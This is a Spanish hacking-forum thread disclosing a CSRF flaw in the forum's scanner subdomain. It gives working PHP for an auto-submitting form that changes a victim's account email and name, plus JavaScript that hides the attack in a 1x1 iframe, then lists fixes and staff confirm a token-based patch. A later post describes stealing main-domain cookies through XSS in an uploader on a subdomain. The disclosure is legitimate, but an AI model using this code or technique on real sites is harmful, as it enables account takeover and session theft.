[CSRF]Scanner Underc0de

Iniciado por Matabarras, Febrero 29, 2016, 10:37:00 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Febrero 29, 2016, 10:37:00 AM
Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php
<?php
//Codded: Matabarras
$url = "scanner.underc0de.org"; //url
//Parametros post que modificaremos :D
$form["password"] = ""; //Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "[email protected]"; //cambiamos el correo por el que queramos
$form["fname"] = "meaburro"; //nombre
$form["lname"] = "vayavaya"; //apellidos
$form["newsletter"] = 0; //recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach($form As $key=>$value) {
	echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>


Camuflar el csrf, easy.

Código: php
// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
	document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');


Index
Código: php
<script src="a.js"></script>


Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.


No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Marzo 01, 2016, 09:25:59 AM #1 Ultima modificación: Marzo 01, 2016, 09:30:48 AM por blackdrake
Solucionada vulnerabilidad mediante aplicación de un token específico para cada cuenta y verificación de contraseña actual.

Reporte de @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Duplicado, reporte original por @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hace 2 semanas.

Gracias por reportar!

Saludos.


Marzo 01, 2016, 05:06:39 PM #2
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Marzo 14, 2016, 01:24:45 PM #3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Marzo 14, 2016, 01:36:15 PM #4
Cierto, Mago se jactaba mientras cantaba bachata(?)
Marzo 15, 2016, 08:00:11 PM #5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Marzo 15, 2016, 08:33:48 PM #6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?
Si, ya pillo por donde ibas  :P en ese caso estando bajo el mismo dominio es cierto que puedes acceder a la cookie del dominio principal
Imprimir
Ir Arriba Páginas1
Acciones del Usuario